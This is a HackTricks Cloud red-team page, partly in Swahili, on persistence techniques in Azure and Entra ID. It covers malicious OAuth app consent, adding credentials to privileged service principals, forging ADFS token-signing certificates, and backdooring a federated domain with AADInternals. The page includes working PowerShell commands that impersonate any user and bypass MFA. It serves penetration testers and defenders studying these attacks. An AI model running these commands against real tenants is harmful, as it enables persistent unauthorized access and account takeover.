HackTricks CloudAz - Persistence
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
OAuth Application
Kwa default, mtumiaji yeyote anaweza kujiandikisha programu katika Entra ID. Hivyo unaweza kujiandikisha programu (tu kwa ajili ya mpangilio wa lengo) inayohitaji ruhusa zenye athari kubwa kwa idhini ya admin (na kuidhinisha ikiwa wewe ni admin) - kama kutuma barua kwa niaba ya mtumiaji, usimamizi wa majukumu n.k. Hii itaturuhusu kutekeleza mashambulizi ya phishing ambayo yatakuwa na faida kubwa endapo yatakuwa na mafanikio.
Zaidi ya hayo, unaweza pia kukubali programu hiyo kwa mtumiaji wako kama njia ya kudumisha ufikiaji juu yake.
Applications and Service Principals
Kwa ruhusa za Msimamizi wa Programu, GA au jukumu la kawaida lenye ruhusa microsoft.directory/applications/credentials/update, tunaweza kuongeza akreditivu (siri au cheti) kwa programu iliyopo.
Inawezekana kulenga programu yenye ruhusa kubwa au kuongeza programu mpya yenye ruhusa kubwa.
Jukumu la kuvutia kuongeza kwenye programu litakuwa jukumu la msimamizi wa uthibitishaji wenye ruhusa kwani linaruhusu kurekebisha nenosiri la Wasimamizi wa Kimataifa.
Teknolojia hii pia inaruhusu kuzidi MFA.
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
- Kwa uthibitisho wa msingi wa cheti
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
Federation - Token Signing Certificate
With DA privileges on on-prem AD, it is possible to create and import new Token signing and Token Decrypt certificates that have a very long validity. This will allow us to log-in as any user whose ImuutableID we know.
Run the below command as DA on the ADFS server(s) to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service:
New-AADIntADFSSelfSignedCertificates
Kisha, sasisha taarifa za cheti na Azure AD:
Update-AADIntADFSFederationSettings -Domain cyberranges.io
Federation - Trusted Domain
With GA privileges on a tenant, it's possible to add a new domain (must be verified), configure its authentication type to Federated and configure the domain to trust a specific certificate (any.sts in the below command) and issuer:
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
Marejeo
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.